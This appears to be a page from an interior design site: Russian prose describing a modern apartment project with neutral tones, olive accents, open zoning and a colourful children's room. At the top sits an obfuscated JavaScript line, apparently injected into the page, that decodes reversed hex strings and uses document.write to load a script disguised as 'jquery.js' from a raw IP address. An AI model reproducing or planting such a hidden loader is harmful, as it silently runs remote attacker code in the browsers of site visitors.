var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));

Дизайн интерьера этого проекта выдержан в современной стилистике. В его основе лежат теплые, нейтральные оттенки, которые разбавлены акцентами оливкового цвета.

В этом интерьере нет чётких границ разделения пространства, оно мягко переходит из одного в другое. Достигнуто это за счёт больших проёмов. Просторная прихожая со встроенным шкафом переходит в зону кухни- столовой, она в свою очередь приводит к зоне гостиной.

Спальня выполнена с более мягким оттенком и совмещает в себе зону рабочего пространства. Различные типы бра и светильников помогут либо заполнить пространство светом, либо сделать его приглушённым. В детской комнате использовали яркие и смелые цвета – жёлтый, голубой, оранжевый. Их исполнение уравновешено и не утяжеляет интерьер, а привносит уют.

Пространство этого проекта функционально, но вместе с тем не перегружено. Часто в этом проекте используются глянцевые поверхности, которые, отражая свет, делают пространство этой квартиры ещё объёмнее.